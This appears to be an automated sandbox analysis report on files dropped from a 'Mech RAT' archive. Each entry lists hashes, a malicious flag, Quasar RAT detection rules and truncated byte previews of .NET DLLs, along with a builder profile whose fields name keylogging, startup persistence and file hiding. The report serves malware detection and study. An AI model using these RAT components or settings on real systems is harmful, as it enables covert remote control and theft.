                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .r..........." ..0..D...........b... ........... ....................................`..................................b..O.......p............L...'...........a..T............................................ ............... ..H............text....B... ...D.................. ..`.rsrc...p............F..............@..@.reloc...............J..............@..B.................b......H........4...'...........\.......a........................................~....}......@.!...}.....(.....s3...}....*..0...........{....,.s....z(.....o......@.{....Y..i(........{.....{.....(......{....X.@/...{.....X}....*.{.....{......{.....io=.....}.......i3.*..+.....@X....i0..{........Yo=......i2....i1....i.Y}.......{......{....(....*.0..`........{....,..{....*.{....,1.{.....|.....{....o<....{.....{......{.....io=.....{....o;...}.....{....*.0..B........{....~....(....,..{....

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.CodeCoverage.Shim.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):15760
                                                                                    Entropy (8bit):6.733319284573964
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:LnIqrxCb3j0WZqnWSW1R7KOTYRHnhWgN7a8WqJ2sJact5equ/X01k9z3Amj7x+M:Ln98j0WZqnWlyHRN799Es56/R9zTjVP
                                                                                    MD5:B0F2E37DC0FBE6CF01672547F9E56E5B
                                                                                    SHA1:2673EB1AB737217E0DC63101D697697C82547185
                                                                                    SHA-256:3A4ED9B3E4B5D706767EF614B52836250E8ABFADB7B8E30E3706C2EB9D1C45E3
                                                                                    SHA-512:8C5F91A0A7BCD44D3F4A61D7F37F9956F7AA0F1D3585460C2EB1F27BB28E6B959F1E3E7ACE6B1FE2C39B06C121D024B6BD383CA3C403AB70DFBB94208476E6DE
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I............." ..0..............+... ...@....... ..............................fu....`.................................=+..O....@...................'...`......|*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................q+......H........!.......................).......................................0..........(....r...p..(....(....(......r...p(.............o....r1..p(....(......(....-..(....&.t......t........(.....(.........o..........%..,.o......r;..p(....(......(......&..*......E._.........(....*BSJB............v2.0.50727......l...`...#~..........#Strings....T...H...#US.........#GUID.......4...#Blob...........G..........3..................................................1.........U...............

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):159144
                                                                                    Entropy (8bit):6.117628890515304
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:vIOjCZch+OpRvMKZNZ3hy3B5HZtdOu8uThF9hZlJ8jaoY:jGZc5HvMKZ73Y3B5HZtdOu8ShZlJ8+l
                                                                                    MD5:2DDC54871FF84B3692AD11BA4A5FF771
                                                                                    SHA1:C5310FEA5760851117EC68B66363F65D5FAE06A3
                                                                                    SHA-256:CB1D59FD79A412B1B05A27B32C342CBC85F018A9F1E1D67B43EBE87E43FEC0D1
                                                                                    SHA-512:C4B6F1F0A1517B7669813F58ECE0B10432DD85E1769584B5502CBB0BF0B440A56353B1B5142AA024886D0A4CABE9447C8EA6173887CA9C7562E5883DEAC07EF0
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .gb.........." ..0..<...........[... ...`....... ....................................@..................................Z..O....`...............F...'...........Y............................................... ............... ..H............text....;... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............D..............@..B.................Z......H.......x....\...........&..x2...Y........................................{'...*..{(...*V.().....}'.....}(...*...0..A........u........4.,/(*....{'....{'...o+...,.(,....{(....{(...o-...*.*.*. ..O. )UU.Z(*....{'...o....X )UU.Z(,....{(...o/...X*...0..b........r...p......%..{'......%q.........-.&.+.......o0....%..{(......%q.........-.&.+.......o0....(1...*:.(2.....}....*..{....*....0..k........rA..p(...+&.rQ..p(...+&..r_..p(...+&..(....-.(....s4...z..(7.........o5...o6......(8...

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):19360
                                                                                    Entropy (8bit):6.517514926671992
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:jFNFUt+ZDmwKCWKhyHRN7/FfsRmuTcR9zuskT:jF7kwDhutERmuU9zuR
                                                                                    MD5:F0BF68CED49E25D46F470D063B9B2532
                                                                                    SHA1:5826195D195BA3317B22FB726E60231E800571EC
                                                                                    SHA-256:C4494B603ECB322627959B2CD782400405A58051229BD09B108861415B1845AA
                                                                                    SHA-512:01EFF16E40FADAB3ACC906C3D7B046363649157FF152A58BABFF0E7300861B16DE8254237B6F39DC781BB2B0609F24EC8EDBC816B1DDA27BFA71D8816C3470C6
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gb.........." ..0..............8... ...@....... ..............................4G....@.................................h8..O....@..L............$...'...`......07............................................... ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......."..............@..B.................8......H.......P ..`....................6......................................BSJB............v4.0.30319......l...$...#~..........#Strings....H.......#US.L.......#GUID...\.......#Blob...........G..........3........'.......2...6.................................................................8.......r...u.r...V.r.....r.....r.....r.....r.....'.....r...0.r.....s...........r...w.....T.r...d.......b.........J...................p.........Y.....;.......r.........M.......r.......".......N.

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):114576
                                                                                    Entropy (8bit):5.987882575161398
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:OCqy+HpgqVw2LexT+15prQSndipRELKihtj5yF6C3MNflzlrD7XdzgM7QgKAh8NQ:oJSYw3ip0aRKihtj5RCgzJxt8NYGi
                                                                                    MD5:A07CD0C9F5B3308A0F2AFE11D67FD60C
                                                                                    SHA1:3E35FFD0632C2BA0E12075F3A59A215BAE4412DE
                                                                                    SHA-256:6536ABA7C1F99CEA9D373773CD0CACF130B0DDFBF47E2C8ACAF4CD880E318045
                                                                                    SHA-512:9FA70DE6B0252E3F852B7CAA6923B7E1221CEF7BFBE9DB10D34E07E2EE5366593621B9C5EA1C8E3E4CCB161CAC128E778B4B38882F82F229A9E0D7C32DB5529D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.gb.........." ..0.................. ........... ...............................W....`.................................D...O........................'........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................x.......H...........H............................................................{%...*..{&...*V.('.....}%.....}&...*...0..A........u........4.,/((....{%....{%...o)...,.(*....{&....{&...o+...*.*.*. ..O. )UU.Z((....{%...o,...X )UU.Z(*....{&...o-...X*...0..b........r...p......%..{%......%q.........-.&.+.......o.....%..{&......%q.........-.&.+.......o.....(/...*V.(0.....(......(....*..{....*"..}....*..{....*"..}....*..*^~....-.s9........~....*.......*b.rA..p(...+&.(B........*..(Q...*..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):34728
                                                                                    Entropy (8bit):6.273323392024227
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:cfuKfVp4MAfCQxA5Xm9nCSqu1LxWF//dj9zw:64nHI29dqudxWZzw
                                                                                    MD5:E3306BF4A03B415EEAF5E3038245146C
                                                                                    SHA1:7C1287FB75CF863BF61D315A5DC6AC21BC224584
                                                                                    SHA-256:8D1C36B6DCED0B1315E71303EF205DBD01D157A4ADD72D874825E0F26C529AA5
                                                                                    SHA-512:C1360BFD93A0AEDBC06C58C79B3FFD6B5599D70B49F5F894BC793332F27F315ED6E3609984A269201064E73987517109FE6B720CECB38FC67EE08E1258CF843C
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gb.........." ..0..V...........t... ........... ..............................o.....`.................................ht..O....................`...'..........0s............................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................t......H.......`8..P:...................r......................................f.(......}.....~....}....*V.(......}......}....*..{....*..{....*.0..........r...p.3...(....~.....s.........r...p.3...(....~.....s.........r-..p.3...(....~.....s.........rI..p.3...(....~....s.........s.........~....~....o....~....~....o....~....~....o....~....~....o....*F.~....(....t3...*6.~.....(....*F.~....(....t3...*6.~.....(....*F.~....(....t3...*6.~.....(....*F.~....(....t3...*6.~.....(....*..(....*.~

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):74128
                                                                                    Entropy (8bit):6.070390732993235
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:CHXw2c75z0KqmKkONYfVmiCpmivfD7XXyAHHof0qokuUz2:u+75zamKXqfVmjnD7XXyAozo4i
                                                                                    MD5:81930CFE170ACD3A8E7498FD706A93C9
                                                                                    SHA1:E1868F03638B3B94027AFE2C4F1CDA84D39C1054
                                                                                    SHA-256:9DDDB3C2958A276F6B6AFD9FADE11CCA191E2F0635F29A39718C60F8F278A4C3
                                                                                    SHA-512:1120633361C962A6828799898B2C43EF72402F6EEC3D40761E875BF5FE08CEA77CDEF762F6B8840B6A747A534427AF2F0B54AE906C39753A7FACB17FF52949AA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a.gb.........." ..0.................. ... ....... .......................`............@.....................................O.... ...................'...@......T................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........X..X...........l...h.............................................(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*^.(.......K...%...}....*:.(......}....*..{....*z.(......}.......K...%...}....*V.(......}......}....*..{....*..{....*.0.....................(....*....0.....................(....*&...(....*:...s....(....*V.(......}......}....*..{....*..{....*2.~....(....*:.(......}....*..{....*:.(......($...*:.(......($...*..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Mdb.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):43008
                                                                                    Entropy (8bit):5.685334400720219
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:Ar5EYZep98C87KHeBUZwrEzsEAnbF+em50KktmM4CRIcZwMRTIzMAtpw:Ar59g98C87KHeBUb5AnZG+zdwMRTzAtS
                                                                                    MD5:1C6ACA0F1B1FA1661FC1E43C79334F7C
                                                                                    SHA1:EC0F591A6D12E1EA7DC8714EC7E5AD7A04EF455D
                                                                                    SHA-256:411F8ED8C49738FA38A56ED8F991D556227D13602E83186E66AE1C4F821C940B
                                                                                    SHA-512:1C59E939D108F15881D29FE4CED4E5FA4A4476394B58B6EB464DA77192CB8FE9221B7CD780AF4596914D4CCE7C3FC53F1BB567F944C58829DE8EFBE1FD87BE76
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... ..............................k.....@.....................................O.......`...............................T............................................ ............... ..H............text....... ...................... ..`.rsrc...`...........................@..@.reloc..............................@..B........................H........a..p\..................8.........................................(....*:...(....(....*&...(....*"..(....*"..(....*"..(....*..(....*.0..,........o....o......o.....jo.....o.....o.....o....*..s....}.....s....}.....s....}......2}.....(.....s4...}....*b.{.....o ....{....o!...*b.{.....o"....{....o#...*6.{.....o$...*.0..-........{....,.s%...z................s.......(.....*..{....,.s%...z.{....-..s&...}.....{......sS...o'...*..{....,.s%...z.{.....o(.......oU...*..{....,.s%..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):89600
                                                                                    Entropy (8bit):6.1605081383984075
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:2OCAsdBo+am5OMwr5IlALYKXgAJGsZhTjrjvjCXeO:ZCjta0OMuIlArVJGqT/jveXeO
                                                                                    MD5:6D5EB860C2BE5DBEB470E7D3F3E7DDA4
                                                                                    SHA1:80C76660B87C52127B1A7DA48E27700F75362041
                                                                                    SHA-256:447EDE1984BB4ACD73BD97C0EC57A11C079CEE8301C91FB199CA98C1906D3CC4
                                                                                    SHA-512:64CF4FE7DE68A35720D2B9338BA9CF182E127D95D72D2CCF7FF5C73A368133663E70C988A460825FA87B2D03717A4447948D5262F56ACEB7C3BF1CB3AB5A41A5
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)"..........." ..0..V...........s... ........... ....................................@..................................r..O.......`............................q..T............................................ ............... ..H............text...LT... ...V.................. ..`.rsrc...`............X..............@..@.reloc...............\..............@..B.................r......H.......<s..$...................`q......................................:.(......}....*..{....-...{....(.....{......o....*..{....-...{....(.....{......o....*....0..a........s....}.....s....}.....o....o.....+(.o......{.....o.......(.....o......(.....o....-....,..o ....*.........".4V.......0..J........o!...o"....+"..(#.....{.....o.......(.....o$.....(%...-...........o ....*........../;.......s&...z.s&...z.s&...z.s&...z.s&...z.s&...z.s&...z.s&...z.s&...z.s&...z.s&...z.s&...z.s&.

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Rocks.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):27648
                                                                                    Entropy (8bit):5.66984672445043
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:70ve8JOuJ5iC7n2NwxEXCni+VXcMeDz8PmR1ugLoaeuLMBG9UphJAprjE3uFLHa9:7+m4iCyrXOhG8uRssveum1pMFLHFBvd
                                                                                    MD5:6E7F0F4FFF6C49E3F66127C23B7F1A53
                                                                                    SHA1:14A529F8C7EE9F002D1E93DCF8FF158AB74C7E1A
                                                                                    SHA-256:2E2623319BDC362974A78EA4A43F4893011EC257884D24267F4594142FCD436E
                                                                                    SHA-512:0C773DA6717DD6919CD6241D3CEE26AB00BB61EA2DBEFF24844A067AF4C87FF5CBDB2FE3ADA5DB4707CEE921B3FB353BD12EE22B8490597D4F67AD39BACE235E
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F............" ..0..d..........&.... ........... ..............................Q.....@....................................O.......l...............................T............................................ ............... ..H............text...,c... ...d.................. ..`.rsrc...l............f..............@..@.reloc...............j..............@..B........................H.......(A..\@..........................................................J.(.....s....}....**..F.(....**..E.(....*z.{.....To.....:o....&...(....*.0..a.........M.(.....o....,,.{.....`o.....`o....&.{.....o....o....o....&.o....,...o....(.....(....,...(....*..-.r...ps ...z.o!...,%.o"...r...p(#...-..o"...r#..p(#...*.*.*n.{.....~o....&..o$...(....*z..P.(.....o%...,...o&...(....*..{.....(o....&.........s'...(...+.{.....)o....&*..0..3........o(.......YE........3...........m...&...`...

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):358400
                                                                                    Entropy (8bit):6.1847100658767244
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:jIevdbLPNYe8bikm98KXPHhOWY/fFREomhUFD3z:se1PNL+QRfBg/f/EWFD
                                                                                    MD5:DE69BB29D6A9DFB615A90DF3580D63B1
                                                                                    SHA1:74446B4DCC146CE61E5216BF7EFAC186ADF7849B
                                                                                    SHA-256:F66F97866433E688ACC3E4CD1E6EF14505F81DF6B26DD6215E376767F6F954BC
                                                                                    SHA-512:6E96A510966A4ACBCA900773D4409720B0771FEDE37F24431BF0D8B9C611EAA152BA05EE588BB17F796D7B8CAACCC10534E7CC1C907C28DDFA54AC4CE3952015
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%............." ..0..p..........&.... ........... ....................................@....................................O.......H...............................T............................................ ............... ..H............text...\n... ...p.................. ..`.rsrc...H............r..............@..@.reloc...............v..............@..B........................H......................................................................"..s1...*"..s1...*>..}2.....}3...*..{2....Q...,..{3...,..{2....Q...o'...*2..Q....4...*6.r...p.(5...*..(6.....}7......i.Q...}8....{7....{8.....i(9.....}:...*2....i.(;...*>..s<.....(=...*V..{8....{7.....(>...*..0..1..........Y./.*...X.[......(>.........(>..........(?...*....0.._..............+P.../5.../..{:......Q......Q...o@....0.....%.X..Q....Q...+.....%.X..Q....Q.....X....2.*z...X...b...X...b`...X..b`...

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Open.Nat.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):70144
                                                                                    Entropy (8bit):5.78589762648947
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:sF6vHHLFkywkNh5qtHMjkCifoydVXw5FxusiolecziijiSvD+ZGFa4Pw6OdrGHUm:8GmyJNh0tbt3MLQ9W2rG0Ydd
                                                                                    MD5:CC6F6503D29A99F37B73BFD881DE8AE0
                                                                                    SHA1:92D3334898DBB718408F1F134FE2914EF666CE46
                                                                                    SHA-256:0B1E0D8F87F557B52315D98C1F4727E539F5120D20B4CA9EDBA548983213FBB5
                                                                                    SHA-512:7F4C0A35B612B864AD9BC6A46370801ED7433424791622BF77BF47D6A776CB6A49E4977B34725EAD5D0FEAA1C9516DB2CA75CB8872C77A8F2FAB6C37740B681F
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......W.........." ..0..............'... ...@....... ....................................`..................................&..O....@..D....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................&......H.......0v......................8&........................................{....*..{....*V.(......}......}....*...0..;........u......,/(.....{.....{....o ...,.(!....{.....{....o"...*.*. .u3d )UU.Z(.....{....o#...X )UU.Z(!....{....o$...X*.0...........r...p......%..{.....................-.q.............-.&.+.......o%....%..{.....................-.q.............-.&.+.......o%....(&...*..{'...*..{(...*V.(......}'.....}(...*...0..;........u......,/(.....{'....{'...o ...,.(!....{(..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1013
                                                                                    Entropy (8bit):5.017779838990778
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:17K0ivy0XrKROKVE2rkrKYO62fkK4fbKsl1cKm8PJqKmCKusEYkKa+nXLUWhl:M0ivymRkC/17c4qI1sIUBhl
                                                                                    MD5:25581BF0865D64D7F8EA5A3ACC956592
                                                                                    SHA1:9190781F80A37B83F6E7FA0ABAFDE0C1EF5FB9D1
                                                                                    SHA-256:A73994F314E7E4930EF03BF8C91C47AAD8198EF40E3EAE50B8FFC1AA448E5A3B
                                                                                    SHA-512:BF2E284B0BEC9D496E3AC00406972DE86DA773F5ADF88A4DF12671FC92F78FDB552A942B3843EDAA51A3FADFE0639CFB73BFFAE1A66003FD65E1954E1AAD3957
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, Author: Joe Security
                                                                                    Preview:<settings>.. <Tag>Office04</Tag>.. <Hosts>.. </Hosts>.. <Delay>3000</Delay>.. <Mutex>a1c8abd1-1a5d-4c7c-bb2f-f980e67c7a2b</Mutex>.. <UnattendedMode>False</UnattendedMode>.. <InstallClient>False</InstallClient>.. <InstallName>Client</InstallName>.. <InstallPath>1</InstallPath>.. <InstallSub>SubDir</InstallSub>.. <HideFile>False</HideFile>.. <HideSubDirectory>False</HideSubDirectory>.. <AddStartup>False</AddStartup>.. <RegistryName>Quasar Client Startup</RegistryName>.. <ChangeIcon>False</ChangeIcon>.. <IconPath>.. </IconPath>.. <ChangeAsmInfo>False</ChangeAsmInfo>.. <Keylogger>False</Keylogger>.. <LogDirectoryName>Logs</LogDirectoryName>.. <HideLogDirectory>False</HideLogDirectory>.. <ProductName>.. </ProductName>.. <Description>.. </Description>.. <CompanyName>.. </CompanyName>.. <Copyright>.. </Copyright>.. <Trademarks>.. </Trademarks>.. <OriginalFilename>.. </OriginalFilename>.. <ProductVersion>.. </ProductVersion>.. <FileVersion>.. </FileVersion>

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.Tests.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):6144
                                                                                    Entropy (8bit):4.400390736215939
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:PW2zmDjGTY4XpEGD/pzLrSS/B4uhCd0oivAJvt:eyTYiEMFSS/B7hCd0Rg
                                                                                    MD5:80F6AD73B7E99271DE1EB4EC8432FFF0
                                                                                    SHA1:3C812B1CB349612C8B7551CB4881569F58348A3C
                                                                                    SHA-256:713CC97507E5B745227A6F1D194C7AE32855FB378B9573ED4819F8B73AEB3EBF
                                                                                    SHA-512:645DF198A6712B163DE602142EC59B342DDD73AF02F4631E74E9DB090DAE537E969B3EF722D1DE3F2344CE8893E5C1C438803E3D1BBEFB04FD107984588B5920
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ...@....... ....................................`.................................4...O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................h.......H........!..@............................................................0.."........d..r...p(....%(....o.......(....*n......%..M.%..Z.(....(....*n......%....%..].(....(....*..(....*...0..8........d(......2(....s....%.o......(......(...+.o.......(...+*.0..J........d(.....(.....o .....2(....s....%.o!.....(.....(".....(#....o$......(%...*..(....*...0...........d(......(&...%(.....(...+*..(....*..0..0.......!........s'... .... ....s(.....o)...%(....("...*..(....*BSJB............

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):64000
                                                                                    Entropy (8bit):5.929506337577614
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:liF6Vg9HIxFMu9brfp0kUEb9k/pUHRfp0YDpb4rILMgYY44YYXINk6I+QyIFLwSt:19UlJf2fhVYkEVIa8IKB
                                                                                    MD5:F6056C568CCF3A2917DDB28211DBD599
                                                                                    SHA1:C8A9EF83C205B55DD638D476245A1B4D66F2D321
                                                                                    SHA-256:BBEEB26BD5327DD4CCACB298D176BCE874BD1393FDF9558199F32568F3948346
                                                                                    SHA-512:BA6C0FC4B807F4A140070C0F3A72D4C3BD1343E8BEFEBF0A321273618B75A11B77E7CD5759534895066A58A3351616D20A4018E3D408F1CBAFE41A79711CB6E9
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, Author: Joe Security
                                                                                    • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, Author: Florian Roth
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....v..........." ..0.................. ... ....... .......................`............`.................................|...O.... .......................@......`................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........W...............................................................(!...*..{....*"..}....*..{....*"..}....*..-..*..3..*.(.....o....3..(.....o......*.*B.-.....*..o....*...(.......*6..u....(....*:.(.....(....a*.r...p.(.....S....(.....S...("...*..(!...*....0..W........(!...~#....s$......r...p(....}......s%...}.....{....o&.......{....o&....~'....js$....*:..o.....((...*^.,..{....,..{....o)...*...0..........s*.......{.....{....o+....o,.......,..o......*..........."......V..P

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.exe.config

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):176
                                                                                    Entropy (8bit):5.010753391314124
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:vFWWMNHU8LdgCQcIMOoIRuQVK/FNURAmIRMNHjFHr0lUfEyhTRtaKWREBAW4QIMO:TMVBd1IffVKNC7VJdfEyFRtUuAW4QIT
                                                                                    MD5:C8CD50E8472B71736E6543F5176A0C12
                                                                                    SHA1:0BD6549820DE5A07AC034777B3DE60021121405E
                                                                                    SHA-256:B44739EEFF82DB2B575A45B668893E2FE8FDD24A709CBF0554732FD3520B2190
                                                                                    SHA-512:6E8F77FCCA5968788CC9F73C9543CE9AB7B416372BC681093AA8A3AAD43AF1F06C56FCBC296C7897A3654B86A6F9D0E8B0FE036677CF290957924377BC177D9F
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>..</configuration>

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Vestris.ResourceLib.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):77824
                                                                                    Entropy (8bit):5.915078814901636
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:CSSYikTF0Z+sFGu11tIcyI1MtI9eDG3fL7:CJYD0Z9FGu11teI1r9ea3
                                                                                    MD5:944CE5123C94C66A50376E7B37E3A6A6
                                                                                    SHA1:A1936AC79C987A5BA47CA3D023F740401F73529B
